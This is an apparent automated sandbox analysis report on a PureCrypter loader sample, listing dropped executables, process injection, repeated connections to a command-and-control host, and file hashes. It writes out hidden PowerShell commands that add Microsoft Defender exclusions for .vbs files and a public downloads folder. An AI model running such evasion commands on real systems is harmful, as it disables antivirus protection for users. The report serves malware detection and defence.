Malware Analysis Report

2025-05-28 17:26

Sample ID 230125-jvbtaafc58
Target c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b
SHA256 c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b
Tags
purecrypter downloader loader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b

Threat Level: Known bad

The file c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b was found to be: Known bad.

Malicious Activity Summary

purecrypter downloader loader

PureCrypter

Executes dropped EXE

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-25 07:58

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-25 07:58

Reported

2023-01-25 08:01

Platform

win7-20221111-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"

Signatures

PureCrypter

loader downloader purecrypter

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Administrator\Desktop\DROP\noicon.exe N/A
N/A N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Administrator\Desktop\DROP\noicon.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 624 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\noicon.exe
PID 624 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\noicon.exe
PID 624 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\noicon.exe
PID 624 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\noicon.exe
PID 624 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\Stearler.exe
PID 624 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\Stearler.exe
PID 624 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\Stearler.exe
PID 624 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Users\Administrator\Desktop\DROP\Stearler.exe
PID 624 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Windows\system32\cmd.exe
PID 624 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Windows\system32\cmd.exe
PID 624 wrote to memory of 576 N/A C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe C:\Windows\system32\cmd.exe
PID 1168 wrote to memory of 288 N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe C:\Windows\SysWOW64\cmd.exe
PID 1168 wrote to memory of 288 N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe C:\Windows\SysWOW64\cmd.exe
PID 1168 wrote to memory of 288 N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe C:\Windows\SysWOW64\cmd.exe
PID 1168 wrote to memory of 288 N/A C:\Users\Administrator\Desktop\DROP\Stearler.exe C:\Windows\SysWOW64\cmd.exe
PID 288 wrote to memory of 952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 288 wrote to memory of 952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 288 wrote to memory of 952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 288 wrote to memory of 952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 288 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 288 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 288 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 288 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe

"C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"

C:\Users\Administrator\Desktop\DROP\noicon.exe

"C:\Users\Administrator\Desktop\DROP\noicon.exe"

C:\Users\Administrator\Desktop\DROP\Stearler.exe

"C:\Users\Administrator\Desktop\DROP\Stearler.exe"

C:\Windows\system32\cmd.exe

"cmd.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS172A.tmp\Testobfusc.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionExtension ".vbs"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 cents-ability.org udp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 cents-ability.org tcp
N/A 198.187.31.39:443 tcp
N/A 198.187.31.39:443 tcp

Files

memory/624-54-0x0000000000870000-0x00000000009B8000-memory.dmp

memory/624-55-0x00000000003D0000-0x0000000000414000-memory.dmp

memory/624-56-0x000000001A810000-0x000000001A8C0000-memory.dmp

memory/460-57-0x0000000000000000-mapping.dmp

C:\Users\Administrator\Desktop\DROP\noicon.exe

MD5 fdd4cd11d278dab26c2c8551e006c4ed
SHA1 f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA256 80d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA512 9333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb

C:\Users\Administrator\Desktop\DROP\noicon.exe

MD5 fdd4cd11d278dab26c2c8551e006c4ed
SHA1 f0ef434d38fa11f8bc38cbc90874ca582867b214
SHA256 80d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
SHA512 9333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb

memory/1168-62-0x0000000075F01000-0x0000000075F03000-memory.dmp

C:\Users\Administrator\Desktop\DROP\Stearler.exe

MD5 c07c33c5e7c12107f2788280ad31c391
SHA1 8e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256 389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA512 8109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1

C:\Users\Administrator\Desktop\DROP\Stearler.exe

MD5 c07c33c5e7c12107f2788280ad31c391
SHA1 8e14f012e98c39d6b20fe14a7532f299e5c001a0
SHA256 389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
SHA512 8109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1

memory/1168-60-0x0000000000000000-mapping.dmp

memory/576-64-0x0000000000000000-mapping.dmp

memory/288-65-0x0000000000000000-mapping.dmp

memory/460-66-0x0000000000990000-0x0000000000998000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS172A.tmp\Testobfusc.bat

MD5 40e65da3d99568737a62d30060539f23
SHA1 c5b616eb054a850b019da2d19e42b82575a269c1
SHA256 a9ea79963c53c3756fc752d4a2978a86de6038fc728fabc200bc87cd938406e5
SHA512 ef19c1001097545955c2d4c3de48bcda7633459577cf3f54653ae0c89fea5e61e763645bdcd2027c303522c98a02893df1f7195b3d26d38a808e7cc78a5c325d

memory/952-68-0x0000000000000000-mapping.dmp

memory/952-71-0x00000000705B0000-0x0000000070B5B000-memory.dmp

memory/1064-72-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 46fd880a2e2393d005384d82190a3a2d
SHA1 bd690cf97f590a517256187be2597286faade65d
SHA256 012668b1abee8653b60c04318046274f87cfcb2f67b950ccb5054dc1e4d72331
SHA512 351270a3c6871a9dcfa760d22aa0b32bf6bccda8332f2053c1ce171e8ef0e8417ea3aeb46d137d3d676de677913cb6eff30b50ecd0a06620e8b9c0812ebbb12d

